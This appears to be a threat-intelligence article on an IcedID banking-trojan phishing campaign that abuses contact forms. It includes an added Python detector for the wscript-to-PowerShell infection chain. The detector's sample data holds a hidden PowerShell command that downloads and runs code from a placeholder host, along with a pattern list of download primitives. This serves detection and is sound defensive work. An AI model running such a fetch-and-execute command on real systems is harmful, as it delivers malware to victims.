IcedID is a modular banking trojan that, once it has infected a device, hooks into online banking sessions to capture financial information, including usernames and passwords. It uses multiple injection methods and can bypass CAPTCHA protection.
The recent phishing campaign abuses websites' contact forms to evade detection, flooding companies with a large volume of phishing and spam messages. The threat is amplified because messages submitted through a company's own contact form are treated as legitimate by its secure email gateway, so they land directly in the user's primary inbox rather than in the spam folder where an ordinary external phishing email would have ended up.
More worrying still, the messages threaten the recipients with legal action for copyright infringement, a pressure tactic that makes targets more likely to click.
Another tactic used by the attackers is to send COVID-19 and other health-themed emails as lures.
When an unwitting victim clicks the link to view the supposed evidence of their copyright infringement, they are asked to sign in with a Google account. After sign-in, a .js file is downloaded to the desktop. Nothing is compromised yet at this point: the infection begins when the user runs the script, which uses WScript and PowerShell to download and execute the IcedID payload together with a Cobalt Strike Beacon. That is the moment the malware takes hold of the victim's device.
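The execution chain above (a .js file run by wscript.exe, which spawns powershell.exe to pull the payload down) is what a defender can look for in process-creation telemetry. The following is an added detection example written for this page, not code from the article or from any vendor; it runs over a handful of constructed Sysmon-style process events (the paths, PIDs and the hostname example.invalid are all made up for the illustration) and flags a PowerShell process whose parent is wscript.exe running a .js/.jse file and whose command line contains a download primitive.

```python
"""Flag the wscript.exe -> powershell.exe download chain in process events.

Added example, not from the original article. The event format and the
sample events below are constructed for this illustration; in practice the
fields map onto Sysmon Event ID 1 (ParentProcessId, ParentImage, Image,
CommandLine) or equivalent EDR telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Constructed sample events (hypothetical paths and hostname).
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    # The dropped .js file being run by the Windows Script Host
    ProcEvent(1100, 1000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Desktop\evidence\report.js"'),
    # The script spawning PowerShell to fetch and run a second stage
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a')\""),
    # Benign PowerShell started from Explorer, no download: must not be flagged
    ProcEvent(1300, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem C:\\Temp"),
    # Benign logon script via wscript with no PowerShell child: must not be flagged
    ProcEvent(1400, 1000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Scripts\logon.vbs"'),
]

# Common PowerShell download primitives seen in script-based droppers.
DOWNLOAD_PATTERN = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|net\.webclient|bitstransfer)",
    re.IGNORECASE,
)
JS_ARG_PATTERN = re.compile(r"\.jse?\b", re.IGNORECASE)


def image_name(path):
    """Return the lower-cased file name part of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_js_to_powershell_chains(events):
    """Return (wscript_event, powershell_event) pairs matching the chain.

    A hit requires all three conditions: the child is powershell.exe, its
    parent is wscript.exe launched against a .js/.jse file, and the child's
    command line contains a download primitive.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if image_name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or image_name(parent.image) != "wscript.exe":
            continue
        if not JS_ARG_PATTERN.search(parent.cmdline):
            continue
        if not DOWNLOAD_PATTERN.search(e.cmdline):
            continue
        hits.append((parent, e))
    return hits


def describe(chain):
    """Human-readable one-line summary of a detected chain."""
    parent, child = chain
    return (f"wscript.exe (pid {parent.pid}) ran a .js file and spawned "
            f"powershell.exe (pid {child.pid}) with a download command")


if __name__ == "__main__":
    for chain in find_js_to_powershell_chains(SAMPLE_EVENTS):
        print(describe(chain))
```

The parent/child relationship is the part that carries the signal: PowerShell downloading content is common in administration, and wscript.exe running scripts is common in logon scripts, but a .js file on a user's desktop launching a hidden PowerShell downloader is the article's infection chain almost verbatim. A production rule would also want the originating ZIP extraction and the Cobalt Strike Beacon network behaviour, which this small example does not cover.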
This IcedID campaign is also region-specific, targeting users in Italy. Its emails carry ZIP attachments and use "fake reply" techniques (messages crafted to look like replies to an existing conversation) in European languages to increase the chance that recipients open them.